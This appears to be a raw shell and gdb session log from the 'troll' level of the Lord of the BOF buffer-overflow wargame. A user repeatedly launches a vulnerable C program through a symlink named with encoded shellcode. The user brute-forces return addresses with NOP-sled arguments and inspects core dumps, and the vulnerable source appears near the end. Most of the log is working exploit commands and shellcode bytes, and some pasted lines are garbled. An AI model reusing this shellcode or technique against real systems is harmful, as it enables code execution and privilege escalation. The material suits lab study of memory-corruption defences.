
0xbfffffe0: 0x32ffffff 0x306951c1 0x69697430 0x6f6a6330

0xbffffff0: 0x5451e48a 0xb19ae28a

(gdb)

0xbffffff8: 0x0081ce0c 0x00000000 Cannot access memory at address 0xc0000000

(gdb)

0xc0000004: Cannot access memory at address 0xc0000004

(gdb)

0xc0000008: Cannot access memory at address 0xc0000008

(gdb)

0xc000000c: Cannot access memory at address 0xc000000c

(gdb)

0xc0000010: Cannot access memory at address 0xc0000010

(gdb)

0xc0000014: Cannot access memory at address 0xc0000014

(gdb)

0xc0000018: Cannot access memory at address 0xc0000018

(gdb)

0xc000001c: Cannot access memory at address 0xc000001c

(gdb)

0xc0000020: Cannot access memory at address 0xc0000020

(gdb)

0xc0000024: Cannot access memory at address 0xc0000024

(gdb)

0xc0000028: Cannot access memory at address 0xc0000028

(gdb)

0xc000002c: Cannot access memory at address 0xc000002c

(gdb)

0xc0000030: Cannot access memory at address 0xc0000030

(gdb)

0xc0000034: Cannot access memory at address 0xc0000034

(gdb)

0xc0000038: Cannot access memory at address 0xc0000038

(gdb)

0xc000003c: Cannot access memory at address 0xc000003c

(gdb)

0xc0000040: Cannot access memory at address 0xc0000040

(gdb)

0xc0000044: Cannot access memory at address 0xc0000044

(gdb)

0xc0000048: Cannot access memory at address 0xc0000048

(gdb)

0xc000004c: Cannot access memory at address 0xc000004c

(gdb)

0xc0000050: Cannot access memory at address 0xc0000050

(gdb)

0xc0000054: Cannot access memory at address 0xc0000054

(gdb)

0xc0000058: Cannot access memory at address 0xc0000058

(gdb)

0xc000005c: Cannot access memory at address 0xc000005c

(gdb)

0xc0000060: Cannot access memory at address 0xc0000060

(gdb)

0xc0000064: Cannot access memory at address 0xc0000064

(gdb)

0xc0000068: Cannot access memory at address 0xc0000068

(gdb)

0xc000006c: Cannot access memory at address 0xc000006c

(gdb)

0xc0000070: Cannot access memory at address 0xc0000070

(gdb)

0xc0000074: Cannot access memory at address 0xc0000074

(gdb)

0xc0000078: Cannot access memory at address 0xc0000078

(gdb)

0xc000007c: Cannot access memory at address 0xc000007c

(gdb)

0xc0000080: Cannot access memory at address 0xc0000080

(gdb)

0xc0000084: Cannot access memory at address 0xc0000084

(gdb)

0xc0000088: Cannot access memory at address 0xc0000088

(gdb)

0xc000008c: Cannot access memory at address 0xc000008c

(gdb)

0xc0000090: Cannot access memory at address 0xc0000090

(gdb)

0xc0000094: Cannot access memory at address 0xc0000094

(gdb)

0xc0000098: Cannot access memory at address 0xc0000098

(gdb)

0xc000009c: Cannot access memory at address 0xc000009c

(gdb)

0xc00000a0: Cannot access memory at address 0xc00000a0

(gdb)

0xc00000a4: Cannot access memory at address 0xc00000a4

(gdb)

0xc00000a8: Cannot access memory at address 0xc00000a8

(gdb)

0xc00000ac: Cannot access memory at address 0xc00000ac

(gdb)

0xc00000b0: Cannot access memory at address 0xc00000b0

(gdb)

0xc00000b4: Cannot access memory at address 0xc00000b4

(gdb)

0xc00000b8: Cannot access memory at address 0xc00000b8

(gdb)

0xc00000bc: Cannot access memory at address 0xc00000bc

(gdb)

0xc00000c0: Cannot access memory at address 0xc00000c0

(gdb)

0xc00000c4: Cannot access memory at address 0xc00000c4

(gdb)

0xc00000c8: Cannot access memory at address 0xc00000c8

(gdb)

0xc00000cc: Cannot access memory at address 0xc00000cc

(gdb)

0xc00000d0: Cannot access memory at address 0xc00000d0

(gdb)

0xc00000d4: Cannot access memory at address 0xc00000d4

(gdb)

0xc00000d8: Cannot access memory at address 0xc00000d8

(gdb)

0xc00000dc: Cannot access memory at address 0xc00000dc

(gdb)

0xc00000e0: Cannot access memory at address 0xc00000e0

(gdb)

0xc00000e4: Cannot access memory at address 0xc00000e4

(gdb)

0xc00000e8: Cannot access memory at address 0xc00000e8

(gdb)

0xc00000ec: Cannot access memory at address 0xc00000ec

(gdb)

0xc00000f0: Cannot access memory at address 0xc00000f0

(gdb)

0xc00000f4: Cannot access memory at address 0xc00000f4

(gdb)

0xc00000f8: Cannot access memory at address 0xc00000f8

(gdb)

0xc00000fc: Cannot access memory at address 0xc00000fc

(gdb)

0xc0000100: Cannot access memory at address 0xc0000100

(gdb)

0xc0000104: Cannot access memory at address 0xc0000104

(gdb)

0xc0000108: Cannot access memory at address 0xc0000108

(gdb)

0xc000010c: Cannot access memory at address 0xc000010c

(gdb)

0xc0000110: Cannot access memory at address 0xc0000110

(gdb)

0xc0000114: Cannot access memory at address 0xc0000114

(gdb)

0xc0000118: Cannot access memory at address 0xc0000118

(gdb)

0xc000011c: Cannot access memory at address 0xc000011c

(gdb)

0xc0000120: Cannot access memory at address 0xc0000120

(gdb)

0xc0000124: Cannot access memory at address 0xc0000124

(gdb)

0xc0000128: Cannot access memory at address 0xc0000128

(gdb)

0xc000012c: Cannot access memory at address 0xc000012c

(gdb)

0xc0000130: Cannot access memory at address 0xc0000130

(gdb)

0xc0000134: Cannot access memory at address 0xc0000134

(gdb)

0xc0000138: Cannot access memory at address 0xc0000138

(gdb)

0xc000013c: Cannot access memory at address 0xc000013c

(gdb)

0xc0000140: Cannot access memory at address 0xc0000140

(gdb)

0xc0000144: Cannot access memory at address 0xc0000144

(gdb)

0xc0000148: Cannot access memory at address 0xc0000148

(gdb)

0xc000014c: Cannot access memory at address 0xc000014c

(gdb)

0xc0000150: Cannot access memory at address 0xc0000150

(gdb)

0xc0000154: Cannot access memory at address 0xc0000154

(gdb)

0xc0000158: Cannot access memory at address 0xc0000158

(gdb)

0xc000015c: Cannot access memory at address 0xc000015c

(gdb) Quit

(gdb) quit

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x44, "\xc0\xff\xff\xbf'`'`

Can't find string terminator '"' anywhere before EOF at -e line 1.

argc must be two!

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x44, "\xc0\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x44, "\xc9\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x44, "\xc8\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x44, "\xcㅁ\xff\xff\xbf"'`

stack is still your friend.

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x44, "\xca\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x44, "\xcb\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x44, "\xcc\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x44, "\xcd\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[orge@localhost orge]$ vi trall.c

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

argc must be two!

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x48'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x47'`

stack is still your friend.

[orge@localhost orge]$ vi trall.c

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x48'

> ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x48'

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x48'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

argc must be two!

[orge@localhost orge]$ gcc trall.c -o trall

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

argc must be two!

[orge@localhost orge]$ vi trall.c

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

argc must be two!

[orge@localhost orge]$ vi trall.c

[orge@localhost orge]$ gcc trall.c -o trall

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

argc must be two!

bffffaf4

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xf4\xfa\xff\xbf"'`

????????????????????????????????????????????哨

Illegal instruction (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xf3\xfa\xff\xbf"'`

????????????????????????????????????????????采

Illegal instruction (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xf5\xfa\xff\xbf"'`

????????????????????????????????????????????衝

Illegal instruction (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xf1\xfa\xff\xbf"'`

????????????????????????????????????????????蒸

Illegal instruction (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xf5\xfa\xff\xbf"'`

????????????????????????????????????????????衝

Illegal instruction (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xbf\xfa\xff\xbf"'`

????????????????????????????????????????????웜

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xf5\xfa\xff\xbf"'`

????????????????????????????????????????????衝

Illegal instruction (core dumped)

[orge@localhost orge]$ gdb -q trall core

warning: core file may not match specified executable file.

Core was generated by `./?^12l?u楕凹2핽i00tii0cjo??T??

귁? '.

Program terminated with signal 4, Illegal instruction.

Reading symbols from /lib/libc.so.6...Xshelldone.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbffffaf5 in ?? ()

(gdb) x/50wx $esp

0xbffffa80: 0x00000000 0xbffffac4 0xbffffad0 0x40013868

0xbffffa90: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffaa0: 0x08048500 0x00000002 0xbffffac4 0x08048390

0xbffffab0: 0x0804868c 0x4000ae60 0xbffffabc 0x40013e90

0xbffffac0: 0x00000002 0xbffffbb8 0xbffffbeb 0x00000000

0xbffffad0: 0xbffffc1c 0xbffffc2b 0xbffffc42 0xbffffc61

0xbffffae0: 0xbffffc83 0xbffffc8d 0xbffffe50 0xbffffe6f

0xbffffaf0: 0xbffffe89 0xbffffe9e 0xbffffeba 0xbffffec5

0xbffffb00: 0xbffffedd 0xbffffeea 0xbffffef2 0xbffffefc

0xbffffb10: 0xbfffff0c 0xbfffff1a 0xbfffff28 0xbfffff39

0xbffffb20: 0xbfffff44 0xbfffff54 0xbfffff94 0x00000000

0xbffffb30: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb40: 0x00000005 0x00000006

(gdb)

0xbffffb48: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffb58: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffb68: 0x0000000b 0x000001fb 0x0000000c 0x000001fb

0xbffffb78: 0x0000000d 0x000001fb 0x0000000e 0x000001fb

0xbffffb88: 0x00000010 0x0febfbff 0x0000000f 0xbffffbb3

0xbffffb98: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffba8: 0x00000000 0x00000000 0x69000000 0x00363836

0xbffffbb8: 0x11eb2f2e 0xb1c9315e 0x0e6c8032 0xe98001ff

0xbffffbc8: 0xebf67501 0xffeae805 0xc132ffff 0x30306951

0xbffffbd8: 0x30696974 0x8a6f6a63 0x8a5451e4 0x0cb19ae2

0xbffffbe8: 0x000081ce 0x00000000 0x00000000 0x00000000

0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc08: 0x00000000 0x00000000

(gdb)

0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc40: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc50: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc60: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc70: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc80: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc90: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffca0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcb0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcc0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcd0: 0x00000000 0x00000000

(gdb) quit

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44'`

stack is still your friend.

bffffac4

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xc4\xfa\xff\xbf"'`

????????????????????????????????????????????퀭

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xf5\xfa\xff\xbf"'`

????????????????????????????????????????????衝

Illegal instruction (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xc4\xfa\xff\xbf"'`

????????????????????????????????????????????퀭

Segmentation fault (core dumped)

[orge@localhost orge]$ vi trall.c

[orge@localhost orge]$ gcc trall.c -o trall

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xc4\xfa\xff\xbf"'`

[1] address check: bffffac4

[3] address check: bffffac4

????????????????????????????????????????????퀭

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44'`

[1] address check: bffffac4

[3] address check: bffffac4

stack is still your friend.

[4] address check: bffffac4

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xc4\xfa\xff\xbf"'`

[1] address check: bffffac4

[3] address check: bffffac4

????????????????????????????????????????????퀭

Segmentation fault (core dumped)

[orge@localhost orge]$ cat trall.c

/*

The Lord of the BOF : The Fellowship of the BOF

- troll

- check argc + argv hunter

*/

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

printf("[1] address check: %x\n", &argv[0]);

// here is changed

if(argc != 2){

printf("argc must be two!\n");

printf("[2] address check: %x\n", &argv[0]);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

printf("[3] address check: %x\n", &argv[0]);

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

printf("[4] address check: %x\n", &argv[0]);

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40);

// one more!

memset(argv[1], 0, strlen(argv[1]));

}

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xc4\xfa\xff\xbf"'`

[1] address check: bffffac4

[3] address check: bffffac4

????????????????????????????????????????????퀭

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xf5\xfa\xff\xbf"'`

[1] address check: bffffac4

[3] address check: bffffac4

????????????????????????????????????????????衝

Illegal instruction (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xc4\xfa\xff\xbf"'`

[1] address check: bffffac4

[3] address check: bffffac4

????????????????????????????????????????????퀭

Segmentation fault (core dumped)

[orge@localhost orge]$ gdb -q trall core

warning: core file may not match specified executable file.

Core was generated by `./?^12l?u楕凹2핽i00tii0cjo??T??

귁? '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...Xshelldone.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbffffac9 in ?? ()

(gdb) x/50wx $esp

0xbffffa80: 0x00000000 0xbffffac4 0xbffffad0 0x40013868

0xbffffa90: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffaa0: 0x08048500 0x00000002 0xbffffac4 0x08048390

0xbffffab0: 0x080486ac 0x4000ae60 0xbffffabc 0x40013e90

0xbffffac0: 0x00000002 0xbffffbb8 0xbffffbeb 0x00000000

0xbffffad0: 0xbffffc1c 0xbffffc2b 0xbffffc42 0xbffffc61

0xbffffae0: 0xbffffc83 0xbffffc8d 0xbffffe50 0xbffffe6f

0xbffffaf0: 0xbffffe89 0xbffffe9e 0xbffffeba 0xbffffec5

0xbffffb00: 0xbffffedd 0xbffffeea 0xbffffef2 0xbffffefc

0xbffffb10: 0xbfffff0c 0xbfffff1a 0xbfffff28 0xbfffff39

0xbffffb20: 0xbfffff44 0xbfffff54 0xbfffff94 0x00000000

0xbffffb30: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb40: 0x00000005 0x00000006

(gdb)

0xbffffb48: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffb58: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffb68: 0x0000000b 0x000001fb 0x0000000c 0x000001fb

0xbffffb78: 0x0000000d 0x000001fb 0x0000000e 0x000001fb

0xbffffb88: 0x00000010 0x0febfbff 0x0000000f 0xbffffbb3

0xbffffb98: 0x00000000 0x00000000 0x00000000 0x00000000

